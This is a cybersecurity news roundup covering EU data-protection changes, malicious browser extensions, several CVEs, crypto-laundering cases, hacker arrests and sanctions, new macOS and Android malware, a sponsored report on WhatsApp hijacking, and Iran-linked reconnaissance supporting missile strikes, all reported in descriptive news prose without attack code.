The European Commission unveiled a proposal for major changes to the European Union’s General Data Protection Regulation (GDPR) and AI Act. Under the new “digital omnibus” package, the E.U. aims to simplify the General Data Protection Regulation (GDPR) and “clarify the definition of personal data” to allow companies to lawfully process personal data for AI training without prior consent from users for “legitimate interest” and as long as they do not break any laws. The move has been criticized for pandering to Big Tech’s interests.

It also amends cookie consent rules on websites, allowing users to “indicate their consent with one-click and save their cookie preferences through central settings of preferences in browsers and operating systems” instead of having to confirm their choice on every website they visit. “Taken together, these changes give both state authorities and powerful companies more room to collect and process personal information with limited oversight and reduced transparency,” the European Digital Rights (EDRi) said. “People will lose straightforward safeguards, and minoritised communities will face even higher exposure to profiling, automated decisions and intrusive monitoring.” Austrian privacy non-profit noyb said the changes “are not ‘maintaining the highest level of personal data protection,’ but massively lower protections for Europeans.”

Browser add-ons turned into data siphons

Malicious Browser Extensions Steal Data

Threat actors are leveraging malicious VPN and ad-blocking extensions for Google Chrome and Microsoft Edge browsers to steal sensitive data. The extensions were collectively installed about 31,000 times.

The extensions, once installed, could intercept and redirect every web page visited by users, collect browsing data and a list of installed extensions, modify or disable other proxy or security tools, and route traffic through attacker-controlled servers, LayerX said. The names of some of the extensions are VPN Professional: Free Unlimited VPN Proxy, Free Unlimited VPN, VPN-free.pro - Free Unlimited VPN for Secure Browsing, Ads Blocker - Block All Ads & Protect Privacy, and Ads Cleaner for Facebook.

Crypto launderer’s luxury spree unravels

California Man Pleads Guilty to Laundering Crypto Stolen in $230M Scam

A 45-year-old from Irvine, California, has pleaded guilty to laundering at least $25 million stolen in a massive $230 million cryptocurrency scam. Kunal Mehta (aka “Papa,” “The Accountant,” and “Shrek”) is the eighth defendant to plead guilty for his participation in this scheme following charges brought by the Department of Justice in May 2025.

The scheme used social engineering to steal hundreds of millions of dollars in cryptocurrency from victims throughout the U.S. through elaborate ruses committed online and through spoofed phone numbers between around October 2023 and March 2025, according to the U.S. Justice Department. The stolen proceeds were used to purchase luxury goods, rental homes, a team of private security guards, and exotic cars. “Mehta created multiple shell companies in 2024 for the purpose of laundering funds through bank accounts created to give the appearance of legitimacy,” the DoJ said.

“To facilitate crypto-to-wire money laundering services, Mehta received stolen cryptocurrency from the group, which they had already laundered. Mehta then transferred the cryptocurrency to associates who further laundered it through sophisticated blockchain laundering techniques. The stolen funds returned to Mehta’s shell company bank accounts through incoming wire transfers from additional shell companies organized by others throughout the United States.” Mehta also personally delivered cash when requested by the members, while also performing wire transfers and facilitating exotic car purchases in exchange for a 10% fee.

Critical Oracle bug opens door to full system takeover

Security Flaw in Oracle Identity Manager

Cybersecurity researchers have disclosed details of a critical security flaw in the Identity Manager product of Oracle Fusion Middleware (CVE-2025-61757, CVSS score: 9.8) that allows an unauthenticated attacker with network access via HTTP to compromise and take control of susceptible systems.

The vulnerability affects versions 12.2.1.4.0 and 14.1.2.1.0. “This pre-authentication RCE we found would also have been able to breach login.us2.oraclecloud.com, as it was running both OAM and OIM,” Searchlight Cyber’s Adam Kues and Shubham Shah said. “The vulnerability our team discovered follows a familiar pattern in Java: filters designed to restrict authentication often contain easy-to-exploit authentication bypass flaws. Logical flaws in how Java interprets request URIs are a gift that continues giving when paired with matrix parameters.” Oracle addressed the vulnerability last month.

Smart relay flaw triggers repeat reboots

Security Flaw in Shelly Pro 4PM Smart Relay

A critical security flaw in the Shelly Pro 4PM smart relay (CVE-2025-11243, CVSS score: 8.3) could be exploited by an attacker to cause a device reboot, limiting the ability to detect abnormal power consumption or exposing circuits to undesirable safety risks. “Unexpected inputs to multiple JSON-RPC methods on the Shelly Pro 4PM v1.4.4 can exhaust resources and trigger device reboots,” Nozomi Networks said. “While the issue does not enable code execution or data theft, it can be used to systematically cause repeatable outages—impacting automation routines and visibility in both home and building contexts.” Users are advised to update to version 1.6.0 and avoid direct internet exposure.

Crypto mixer founders jailed for laundering millions

Samourai Wallet Co-Founders Get Multi-Year Prison Term

Keonne Rodriguez and William Lonergan Hill, co-founders of the crypto mixing service Samourai Wallet, were sentenced to five and four years in prison, respectively, for their role in facilitating over $237 million in illegal transactions.

Both defendants pleaded guilty to charges of knowingly transmitting criminal proceeds back in August 2025. The defendants, per U.S. prosecutors, designed Samourai around a Bitcoin mixing service known as Whirlpool and Ricochet to conceal the nature of illicit transactions. “Over $237 million of criminal proceeds laundered through Samourai came from, among other things, drug trafficking, darknet marketplaces, cyber-intrusions, frauds, sanctioned jurisdictions, murder-for-hire schemes, and a child pornography website,” the U.S. Justice Department said.

glob CLI flaw opens door to code injection

Security Flaw in glob CLI

A security flaw (CVE-2025-64756, CVSS score: 7.5) has been identified in glob CLI’s -c/--cmd flag that could result in operating system command injection, leading to remote code execution. “When glob -c is used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges,” glob maintainers said in an alert. An attacker could leverage the flaw to execute arbitrary commands, compromising a developer’s machine or paving the way for supply chain poisoning via malicious packages.

The vulnerability affects glob versions from 10.2.0 through 11.0.3. It has been patched in versions 10.5.0, 11.1.0, and 12.0.0. According to AISLE, which discovered and reported the flaw along with Gyde04, “you are not affected if you only use glob’s library API (glob(), globSync(), async iterators) without invoking the CLI tool.”

Russian cyber operative caught in Phuket

Russian Hacker Wanted by U.S. Arrested in Thailand

A Russian national alleged to be affiliated with the Void Blizzard (aka Laundry Bear) hacking group has been arrested in Phuket, according to CNN.

Denis Obrezko, 35, was arrested on November 6, 2025, as part of a joint operation between the U.S. Federal Bureau of Investigation (FBI) and Thai officials. He was arrested a week after entering the country on a flight to Phuket. Earlier this May, Microsoft attributed Void Blizzard to espionage operations targeting organizations that are important to Russian government objectives, including those in government, defense, transportation, media, non-governmental organizations (NGOs), and healthcare sectors in Europe and North America, since at least April 2024.

X debuts encrypted messaging with PIN-secured keys

X Rolls Out Encrypted Chat

X has revealed Chat, an encrypted upgrade to the platform’s direct messaging service with support for video and voice calls, disappearing messages, and file sharing. In an X post, the social media platform said users can block screenshots and get notified of attempts. X first began rolling out encrypted DMs in May 2023 before pausing the feature on May 29, 2025, to make some improvements. “When entering Chat for the first time, a private-public key pair is created specific to each user,” the company said.

“Users are prompted to enter a PIN (which never leaves the device), which is used to keep the private key securely stored on X’s infrastructure. This private key can then be recovered from any device if the user knows the PIN. In addition to the private-public key pairs, there is a per-conversation key that is used to encrypt the content of the messages. The private-public key pairs are used to exchange the conversation key securely between participating users.”

Fake Microsoft invites fuel voice-phishing scam

Phishing Campaign Uses Entra Guest User Invites for TOAD Attacks

A new phishing campaign has been observed weaponizing Microsoft Entra guest user invitations to deceive recipients into making phone calls to attackers posing as Microsoft support.

The campaign uses Microsoft Entra tenant invitations sent from the legitimate invites@microsoft[.]com address to bypass email filters and establish trust with targets.

Jabber Zeus coder extradited to face U.S. justice

Ukrainian Extradited to U.S. Faces Charges in Jabber Zeus Case

A Ukrainian national believed to be a developer for the Jabber Zeus cybercrime group has been reportedly extradited from Italy to the U.S.

The man, Yuriy Igorevich Rybtsov, 41, of Donetsk, is alleged to be MrICQ (aka John Doe #3), according to a report from security journalist Brian Krebs. He is accused of handling notifications of newly compromised entities, as well as of laundering the illicit proceeds from the scheme. Another member of the group, Vyacheslav “Tank” Igorevich Penchukov, pleaded guilty to his role in two different malware schemes, Zeus and IcedID, in February 2024. Later that July, he was sentenced to 18 years and ordered to pay more than $73 million in restitution to victims.

Speaking exclusively to the BBC earlier this month, the 39-year-old described himself as a “friendly guy.” At one point, he ditched cybercrime to start a company buying and selling coal, only to be lured back into it due to business troubles and the promise of good money by becoming a ransomware affiliate. In the meantime, he has been making the most of his prison time, getting high-school diplomas and learning French and English. Penchukov also acknowledged that Russian cybercrime groups worked with security services, such as the FSB. “You can’t make friends in cybercrime, because the next day, your friends will be arrested and they will become an informant,” he was quoted as saying.

“Paranoia is a constant friend of hackers.” In a report published this month, Analyst1 researcher Anastasia Sentsova said, “the Russian state has gotten its hands dirty and set up several hacktivist groups to support its war in Ukraine.”

Media Land hit with sanctions over ransomware links

Russian Bulletproof Hosting Provider Media Land Sanctioned for Ransomware Ties

The U.S., the U.K., and Australia have sanctioned Russian bulletproof hosting (BPH) provider Media Land and its executives, including general director Aleksandr Volosovik (aka Yalishanda), for providing services to cybercrime and ransomware groups like Evil Corp, LockBit, Black Basta, BlackSuit, and Play. The U.S. Treasury Department’s Office of Foreign Assets Control (OFAC) has also designated Hypercore Ltd., a front company of Aeza Group LLC (Aeza Group), along with two additional individuals and two entities that have led, materially supported, or acted for Aeza Group, including Maksim Vladimirovich Makarov, Ilya Vladislavovich Zakirov, Smart Digital Ideas DOO, and Datavice MCHJ. “These so-called bulletproof hosting service providers like Media Land provide cybercriminals essential services to aid them in attacking businesses in the United States and in allied countries,” said Under Secretary of the Treasury for Terrorism and Financial Intelligence John K. Hurley. In tandem, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an alert to help internet service providers and network defenders mitigate the risks posed by BPH providers. “These providers enable malicious activities such as ransomware, phishing, malware delivery, and denial-of-service (DoS) attacks, posing an imminent and significant risk to the resilience and safety of critical systems and services,” CISA said.

Researchers reengineer PoolParty in C#

Porting PoolParty from C++ to C#

Cybersecurity researchers have released a C# implementation of PoolParty, a collection of process injection techniques that target Windows Thread Pools to evade endpoint detection and response (EDR) systems. PoolParty was first detailed by SafeBreach in late 2023. Its C# implementation, codenamed SharpParty by Trustwave and Stroz Friedberg, enables the PoolParty techniques to be used in tools that leverage inline MSBuild tasks in XML files.

New macOS malware hijacks crypto apps

New NovaStealer Spotted

Cybersecurity researchers have detailed a new macOS stealer malware called NovaStealer that can exfiltrate wallet-related files, collect telemetry data, and replace legitimate Ledger/Trezor applications with tampered copies.

“An unknown dropper fetches and runs mdriversinstall.sh, which installs a small scripts orchestrator under ~/.mdrivers and registers a LaunchAgent labeled application.com.artificialintelligence,” a security researcher who goes by the name Bruce said. “This orchestrator pulls additional scripts encoded in b64 from the C2, drops them under ~/.mdrivers/scripts, and runs them in detached screen sessions in the background. It supports updates and handles the restart of responsible screen sessions.”

Every week, new online dangers pop up. Real stories show how much our daily lives depend on the internet.

The same apps and tools that make life quicker and easier can also let bad guys in. It’s not just for experts anymore. Anyone who goes online, clicks links, or shares stuff needs to pay attention. Governments try to catch hackers, and experts find secret weak spots.

But one thing is always true: keeping our digital world safe never ends. The best thing we can do is learn from what happens, fix our apps and passwords, and watch out for new tricks. I’ll keep sharing simple updates and closer looks at the big stories about cyber threats, privacy, and staying safe online.


CTM360 Exposes a Global WhatsApp Hijacking Campaign: HackOnChat

CTM360 has identified a rapidly expanding WhatsApp account-hacking campaign targeting users worldwide via a network of deceptive authentication portals and impersonation pages. The campaign, internally dubbed HackOnChat, abuses WhatsApp’s familiar web interface, using social engineering tactics to trick users into compromising their accounts. Investigators identified thousands of malicious URLs being hosted on inexpensive top-level domains and rapidly generated through modern website-building platforms, allowing attackers to deploy new pages at scale. The campaign’s activity logs show hundreds of incidents in recent weeks, with a noticeable surge across the Middle East and Asia.

Read the full report here: https://www.ctm360.com/reports/hackonchat-unmasking-the-whatsapp-hacking-scam

The hacking operations and the exploitation techniques

Two techniques dominate these hacking operations: Session Hijacking, where threat actors misuse the linked-device functionality to hijack active WhatsApp Web sessions, and Account Takeover, which involves deceiving victims into surrendering authentication keys, granting attackers full control of their accounts. Attackers push these links using templates of fake security alerts, WhatsApp Web lookalike portals, and spoofed group-invite messages. These sites are further optimized for global reach, featuring multilingual support and a country-code selector that adapts the interface for users across multiple regions.

Once scammers gain control of a WhatsApp account, they exploit it to target the victim’s contacts, often requesting money or sensitive information under the guise of a trusted source. They may also sift through messages, media, and documents to steal personal, financial, or private data, which can be used for fraud, impersonation, or extortion. Frequently, these attacks extend further as the compromised account is used to send phishing messages to the victim’s contacts, creating a chain of attacks that spreads the scam. HackOnChat demonstrates that social engineering remains one of the most scalable attack vectors today, especially when attackers exploit trusted and familiar interfaces and the human trust built around them.

Read the full report here and explore all of CTM360’s latest insights and threat intelligence. Learn more at www.ctm360.com

This article is a contributed piece from one of our valued partners.

New Sturnus Android Trojan Quietly Captures Encrypted Chats and Hijacks Devices

Cybersecurity researchers have disclosed details of a new Android banking trojan called Sturnus that enables credential theft and full device takeover to conduct financial fraud. “A key differentiator is its ability to bypass encrypted messaging,” ThreatFabric said in a report shared with The Hacker News. “By capturing content directly from the device screen after decryption, Sturnus can monitor communications via WhatsApp, Telegram, and Signal.” Another notable feature is its ability to stage overlay attacks by serving fake login screens atop banking apps to capture victims’ credentials. According to the Dutch mobile security company, Sturnus is privately operated and is currently assessed to be in the evaluation stage.

Artifacts distributing the banking malware are listed below -

- Google Chrome (“com.klivkfbky.izaybebnx”)
- Preemix Box (“com.uvxuthoq.noscjahae”)

The malware has been designed to specifically single out financial institutions across Southern and Central Europe with region-specific overlays. The name Sturnus is a nod to its use of a mixed communication pattern blending plaintext, AES, and RSA, with ThreatFabric likening it to the European starling (binomial name: Sturnus vulgaris), which incorporates a variety of whistles and is known to be a vocal mimic. The trojan, once launched, contacts a remote server over WebSocket and HTTP channels to register the device and receive encrypted payloads in return. It also establishes a WebSocket channel to allow the threat actors to interact with the compromised Android device during Virtual Network Computing (VNC) sessions.

Besides serving fake overlays for banking apps, Sturnus is also capable of abusing Android’s accessibility services to capture keystrokes and record user interface (UI) interactions. As soon as an overlay for a bank is served to the victim and the credentials are harvested, the overlay for that specific target is disabled so as not to arouse the user’s suspicion. Furthermore, it can display a full-screen overlay that blocks all visual feedback and mimics the Android operating system update screen to give the impression to the user that software updates are in progress, when, in reality, it allows malicious actions to be carried out in the background. Some of the malware’s other features include support for monitoring device activity, as well as leveraging accessibility services to gather chat contents from Signal, Telegram, and WhatsApp when they are opened by the victim, and send details about every visible interface element on the screen.

This allows the attackers to reconstruct the layout at their end and remotely issue actions related to clicks, text input, scrolling, app launches, permission confirmations, and even enable a black screen overlay. An alternate remote control mechanism packed into Sturnus uses the system’s display-capture framework to mirror the device screen in real-time. “Whenever the user navigates to settings screens that could disable its administrator status, the malware detects the attempt through accessibility monitoring, identifies relevant controls, and automatically navigates away from the page to interrupt the user,” ThreatFabric said. “Until its administrator rights are manually revoked, both ordinary uninstallation and removal through tools like ADB are blocked, giving the malware strong protection against cleanup attempts.” The extensive environment monitoring capabilities make it possible to collect sensor information, network conditions, hardware data, and an inventory of installed apps.

This device profile serves as a continuous feedback loop, helping attackers adapt their tactics to sidestep detection. “Although the spread remains limited at this stage, the combination of targeted geography and high-value application focus implies that the attackers are refining their tooling ahead of broader or more coordinated operations,” ThreatFabric said.

Iran-Linked Hackers Mapped Ship AIS Data Days Before Real-World Missile Strike Attempt

Threat actors with ties to Iran engaged in cyber warfare as part of efforts to facilitate and enhance physical, real-world attacks, a trend that Amazon has called cyber-enabled kinetic targeting. The development is a sign that the lines between state-sponsored cyber attacks and kinetic warfare are increasingly blurring, necessitating a new category of warfare, the tech giant’s threat intelligence team said in a report shared with The Hacker News. While traditional cybersecurity frameworks have treated digital and physical threats as separate domains, CJ Moses, CISO of Amazon Integrated Security, said these delineations are artificial and that nation-state threat actors are engaging in cyber reconnaissance activity to enable kinetic targeting. “These aren’t just cyber attacks that happen to cause physical damage; they are coordinated campaigns where digital operations are specifically designed to support physical military objectives,” Moses added.

As an example, Amazon said it observed Imperial Kitten (aka Tortoiseshell), a hacking group assessed to be affiliated with Iran’s Islamic Revolutionary Guard Corps (IRGC), conducting digital reconnaissance between December 2021 and January 2024, targeting a ship’s Automatic Identification System (AIS) platform with the goal of gaining access to critical shipping infrastructure. Subsequently, the threat actor was identified as attacking additional maritime vessel platforms, in one case even gaining access to CCTV cameras fitted on a maritime vessel that provided real-time visual intelligence. The attack progressed to a targeted intelligence gathering phase on January 27, 2024, when Imperial Kitten carried out targeted searches for AIS location data for a specific shipping vessel. Merely days later, that same vessel was targeted by an unsuccessful missile strike carried out by Iranian-backed Houthi militants.

A string of missile attacks targeting commercial shipping in the Red Sea, carried out in support of the Palestinian militant group Hamas in its war with Israel, has been attributed to the Houthi forces. On February 1, 2024, the Houthi movement in Yemen claimed it had struck a U.S. merchant ship named KOI with “several appropriate naval missiles.” “This case demonstrates how cyber operations can provide adversaries with the precise intelligence needed to conduct targeted physical attacks against maritime infrastructure – a critical component of global commerce and military logistics,” Moses said. Another case study concerns MuddyWater, a threat actor linked to Iran’s Ministry of Intelligence and Security (MOIS), that established infrastructure for a cyber network operation in May 2025, and a month later used that server to access another compromised server containing live CCTV streams from Jerusalem to gather real-time visual intelligence of potential targets.

On June 23, 2025, around the time Iran launched widespread missile attacks against the city, the Israel National Cyber Directorate disclosed that “Iranians have been trying to connect to cameras to understand what happened and where their missiles hit to improve their precision.” To pull off these multi-layered attacks, the threat actors are said to have routed their traffic through anonymizing VPN services to obscure their true origins and complicate attribution efforts. The findings serve to highlight that espionage-focused attacks can ultimately be a launchpad for kinetic targeting. “Nation-state actors are recognizing the force multiplier effect of combining digital reconnaissance with physical attacks,” Amazon said. “This trend represents a fundamental evolution in warfare, where the traditional boundaries between cyber and kinetic operations are dissolving.”
